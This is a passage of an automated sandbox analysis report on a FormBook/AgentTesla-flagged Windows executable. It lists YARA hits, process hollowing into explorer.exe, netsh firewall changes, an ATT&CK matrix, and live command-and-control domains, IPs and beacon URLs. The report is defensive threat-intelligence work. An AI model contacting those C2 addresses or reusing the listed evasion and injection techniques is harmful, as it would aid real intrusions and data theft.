          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Masquerading          		OS Credential Dumping221
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562157 Sample: triage_dropped_file Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 33 www.hstolchsjybyl.com 2->33 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Multi AV Scanner detection for domain / URL 2->41 43 Found malware configuration 2->43 45 9 other signatures 2->45 11 triage_dropped_file.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\...\triage_dropped_file.exe.log, ASCII 11->31 dropped 61 Tries to detect virtualization through RDTSC time measurements 11->61 63 Injects a PE file into a foreign processes 11->63 15 triage_dropped_file.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.inspectdecided.xyz 104.21.22.47, 49811, 80 CLOUDFLARENETUS United States 18->35 37 www.fengyat.club 188.114.96.7, 49818, 80 CLOUDFLARENETUS European Union 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 49 Performs DNS queries to domains with low reputation 18->49 51 Uses netsh to modify the Windows network and firewall settings 18->51 22 netsh.exe 18->22         started        25 autofmt.exe 18->25         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          triage_dropped_file.exe52%VirustotalBrowse
          triage_dropped_file.exe22%MetadefenderBrowse
          triage_dropped_file.exe70%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          triage_dropped_file.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.triage_dropped_file.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.triage_dropped_file.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.triage_dropped_file.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.triage_dropped_file.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.fengyat.club3%VirustotalBrowse
          www.hstolchsjybyl.com9%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY100%Avira URL Cloudphishing
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.inspectdecided.xyz/a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw100%Avira URL Cloudmalware
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          https://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          www.hstolchsjybyl.com/a83r/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.fengyat.club
          		188.114.96.7
          		truetrueunknown
          www.inspectdecided.xyz
          		104.21.22.47
          		truetrue
            		unknown
            www.hstolchsjybyl.com
            		81.17.29.148
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlYtrue
            • Avira URL Cloud: phishing
            		unknown
            http://www.inspectdecided.xyz/a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Awtrue
            • Avira URL Cloud: malware
            		unknown
            www.hstolchsjybyl.com/a83r/true
            • Avira URL Cloud: safe
            		low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.apache.org/licenses/LICENSE-2.0triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.fontbureau.comtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.fontbureau.com/designersGtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/?triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bThetriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.tiro.comtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designerstriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.goodfont.co.krtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.carterandcone.comltriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.comtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/cThetriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://fontfabrik.comtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cntriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-jones.htmltriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleasetriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAUnetsh.exe, 00000015.00000002.508497222.0000000003C2F000.00000004.10000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fonts.comtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sandoll.co.krtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleasetriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cntriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comtriage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                188.114.96.7
                                		www.fengyat.clubEuropean Union
                                		13335CLOUDFLARENETUStrue
                                104.21.22.47
                                		www.inspectdecided.xyzUnited States
                                		13335CLOUDFLARENETUStrue

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:562157
                                Start date:28.01.2022
                                Start time:15:15:49
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 11m 40s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:triage_dropped_file (renamed file extension from none to exe)
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@8/1@3/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 24.5% (good quality ratio 22%)
                                • Quality average: 70.1%
                                • Quality standard deviation: 32.6%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 20.54.104.15, 20.54.7.98, 40.91.112.76
                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                • Not all processes where analyzed, report is missing behavior information
